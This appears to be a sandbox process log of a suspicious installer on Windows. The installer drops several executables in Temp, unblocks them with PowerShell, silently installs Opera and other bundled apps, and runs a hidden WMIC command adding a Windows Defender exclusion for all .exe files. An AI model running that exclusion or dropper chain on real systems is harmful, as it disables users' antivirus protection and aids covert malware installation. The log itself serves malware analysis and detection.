"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6392 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:2
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe
"C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe"
C:\Users\Admin\AppData\Local\Temp\is-NPFQQ.tmp\setup_CU3cRmqhm4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NPFQQ.tmp\setup_CU3cRmqhm4.tmp" /SL5="$4021E,6120275,56832,C:\Users\Admin\Desktop\setup_CU3cRmqhm4.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 2ad8c9944d9a5b4bd746bfd3542cea0b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2124
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1904
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2192
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2168,13376965914691236147,18019486639377659627,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6828 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2024
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2228
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2264
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2216
C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe
C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe
C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe
C:\Users\Admin\AppData\Local\Temp\DgdC3TvE\RP3U09NqkneL.exe /sid=3 /pid=1090
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1112 -ip 1112
C:\Users\Admin\AppData\Local\Temp\is-G7OL2.tmp\lNdzzyFPAwOlp5XgSLE.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G7OL2.tmp\lNdzzyFPAwOlp5XgSLE.tmp" /SL5="$2037E,4415326,54272,C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2304
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1980
C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe
C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2304
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --silent --allusers=0 --server-tracking-blob=MzNjMTA4ZjMyY2NhODIyNzg2OTFkNzI4YjQ4OTAxYmJlMWY4Y2VjZDE3ZDU5NWRhOTdlYmM3N2Y1NTIxOWU0ZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY4NTUuMzk5MiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiMmQyNzdlYWYtNGUwZi00YjgzLWI5M2ItNWIyYzhmMGFiNjQxIn0=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2336
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x334,0x344,0x7246b1f4,0x7246b200,0x7246b20c
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1112 -ip 1112
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2932 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051422" --session-guid=6ac85972-20d2-4b1a-8fb5-2fb666282061 --server-tracking-blob=YTMzYWZmM2RkZTFhODJlMzA0NTUzZTFiODk0NTkxZDI2MzFiZGY5MjE0OTFmOWM0MjJkMjQ0ZTQ1ODBlZjI2Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjg1NS4zOTkyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIyZDI3N2VhZi00ZTBmLTRiODMtYjkzYi01YjJjOGYwYWI2NDEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2312
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x718bb1f4,0x718bb200,0x718bb20c
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2236
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1924
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2340
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2220
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe
